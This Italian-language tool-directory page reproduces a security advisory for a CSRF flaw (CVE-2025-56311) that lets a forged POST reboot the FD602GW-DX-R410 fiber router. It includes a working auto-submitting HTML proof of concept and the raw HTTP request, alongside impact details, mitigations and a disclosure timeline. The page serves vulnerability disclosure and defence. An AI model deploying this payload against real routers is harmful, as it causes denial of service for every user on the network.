Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-56311 — Vulnerabilità CSRF nel router FD602GW-DX-R410 permette a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato. | Kitploit
Strumenti/GitHubGitHub/wrathfuldiety/cve-2025-56311
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

Vulnerabilità CSRF nel router FD602GW-DX-R410 permette a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.

Vedi Repository
61 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-56311: Advisory di Sicurezza – Vulnerabilità CSRF nella funzione di riavvio del router FD602GW-DX-R410

Proof of Concept e Advisory di Sicurezza per una vulnerabilità di Cross-Site Request Forgery (CSRF) nell'interfaccia di amministrazione del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'advisory delinea l'impatto, il vettore di attacco e le raccomandazioni per la mitigazione.

fd602gw-dx-r410-csrf-advisory

La vulnerabilità CSRF nel router FD602GW-DX-R410 consente a un attaccante remoto di riavviare il dispositivo tramite una richiesta POST manipolata a /boaform/admin/formReboot quando un amministratore è autenticato.


Panoramica

Una vulnerabilità Cross-Site Request Forgery (CSRF) è stata scoperta nella console di amministrazione web del router fiber FD602GW-DX-R410 (Firmware V2.2.14). L'endpoint /boaform/admin/formReboot accetta richieste POST che attivano un riavvio completo del dispositivo senza token CSRF o validazione dell'origine. Se un amministratore autenticato visita una pagina dannosa, il router può essere riavviato da remoto senza consenso.

  • ID CVE: CVE-2025-56311
  • Data di pubblicazione dell'advisory: Luglio 2025
  • Scoperto da: Hasanka Amarasinghe (Ricercatore di Sicurezza Indipendente)
  • Vendor: Shenzhen C-Data Technology Co., Ltd.
  • Prodotto interessato: FD602GW-DX-R410 Fiber Router
  • Versione Firmware: V2.2.14 (Build.1918.241111)
  • Versione Hardware: R410.1B
  • Versione Bootloader: V3.7-2312181457
  • Web Server: Boa/0.93.15
  • Vettore di accesso: Remoto (l'amministratore autenticato deve aver effettuato l'accesso)
  • Gravità: Media
  • Punteggio Base CVSS v3.1: 5.4 (Media)

Prodotto Interessato

  • Dispositivo: FD602GW-DX-R410 Fiber Router
  • Firmware: V2.2.14 (Build.1918.241111)
  • Componente: Gestore Riavvio - /boaform/admin/formReboot
  • Web Server: Boa/0.93.15

Dettagli della Vulnerabilità

  • Tipo: Cross-Site Request Forgery (CSRF)
  • Vettore di attacco: Remoto (l'amministratore deve aver effettuato l'accesso alla propria sessione)
  • Autenticazione: Nessuna richiesta per l'attaccante (sessione amministratore richiesta sul browser della vittima)
  • Impatto: Riavvio non autorizzato del dispositivo
  • Persistenza dello stato: Sessione senza stato, probabilmente tracciata tramite IP o token di sessione interni

Proof of Concept (PoC)

Payload CSRF (HTML)

<html>
  <!-- CSRF PoC - generated by Burp Suite Pro -->
  <body>
    <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
      <input type="hidden" name="postSecurityFlag" value="+65535" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Richiesta HTTP

POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

postSecurityFlag=+65535

Risposta

HTTP 200 OK; Il router si riavvia immediatamente.


Raccomandazioni

  • Implementare token CSRF e una validazione rigorosa di Origin/Referer su tutti gli endpoint di amministrazione.
  • Invalidare le sessioni obsolete o orfane e associare le sessioni a cookie sicuri.
  • Considerare l'uso di CAPTCHA o prompt di conferma prima di eseguire azioni distruttive come il riavvio.
  • Limitare l'accesso all'interfaccia di amministrazione solo a IP fidati o reti interne.

Vettore di Attacco

  • Richiede che l'amministratore del router sia autenticato (abbia effettuato l'accesso).
  • Un attaccante induce la vittima a visitare una pagina web dannosa che attiva silenziosamente una richiesta POST all'endpoint di riavvio.
  • Il router accetta la richiesta falsificata e si riavvia immediatamente, causando un denial of service.

Impatto

  • Denial of service a causa del riavvio forzato.
  • Perdita di disponibilità della rete per tutti gli utenti connessi.
  • Possibilità di concatenarsi con altri problemi (ad esempio, session hijack o XSS) per aumentare l'impatto.

Cronologia della Divulgazione

DataAzione
Giu 2025Vulnerabilità scoperta
Giu 2025Tentativo di divulgazione responsabile (nessuna risposta)
Lug 2025Richiesto ID CVE a MITRE
Lug 2025Advisory preparato e in attesa di pubblicazione
Set 2025CVE Assegnato, Advisory reso pubblico

Riferimenti

  • Vendor: Shenzhen C-Data Technology Co., Ltd.
  • Dispositivo: FD602GW-DX-R410
  • Firmware: V2.2.14
  • GitHub Advisory: https://github.com/wrathfulDiety/CVE-2025-56311

Disclaimer

Questo advisory è fornito a scopo educativo e di sensibilizzazione sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio. Tutti i test sono stati eseguiti in un ambiente controllato.

Scarica lo strumento